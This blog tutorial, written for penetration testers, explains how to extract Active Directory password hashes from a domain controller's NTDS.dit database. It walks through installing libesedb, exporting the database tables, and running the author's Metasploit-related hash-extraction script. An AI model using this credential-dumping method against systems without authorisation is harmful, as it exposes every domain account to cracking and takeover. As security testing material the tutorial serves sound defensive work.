Earlier this week I released a blog post on the Accuvant website explaining at a high level some of the techniques and use cases for my recently developed Metasploit modules. This article will be the first in a series of tutorials where I plan to do a deeper dive into the individual modules and some of their many uses during a penetration test.
The ntds_hashextract.rb script is a standalone tool that can be used to quickly and efficiently extract Active Directory user account password hashes from the exported datatable of an NTDS.dit database. As it turns out, exporting the datatable can sometimes be tricky so here is a detailed tutorial covering the methodology that I use and continue to have success with.
Step 1 – Install Libesedb
Libesedb is an open source C library developed to forensically extract information from Extensible Storage Engine (ESE) database files. In order to get what we need out of NTDS.dit we will first have to download and install the library using the following URL
Next we will need to extract the tarball, configure, make and install the library using the command line.
- $tar xvzf libesedb-alpha-20120102.tar.gz
- $cd libesedb-20120102
- $make && make install
This is what the finished output looked like for me after everything was done on a fresh copy of Backtrack 5.
Step 2 – Export Tables From NTDS.dit
Now that you have a working install of the Libesedb library make sure you’ve got a proper copy of the NTDS.dit database as well as the SYSTEM registry hive file on your machine. In case you weren’t already aware, you can use another one of my modules ntdsgrab.rb to obtain these items from a Windows Domain Controller, provided you have proper credentials or course. Here is what they look like on my system after downloading them via the Metasploit Framework.
Change into whatever directory contains your loot, in my case the /tmp/NTDS_Grab directory and run esedbexport from the libesedb/esedbtools directory against your NTDS.dit database. It will export all of the tables and store them in a newly created directory called ntds.export.
Step 3 – Dump All The Hashes
At this point you’re ready to run ntds_hashextract.rb against the datatable (Table #4) and the SYSTEM registry hive file in order to grab all of the domain password hashes. If the domain is large enough (several thousand unique users) the command might take a few minutes to finish on your system so go grab a cup of coffee. When it’s done it should look something like this.
That’s all for now, check back soon for more in this series.
Thanks for reading.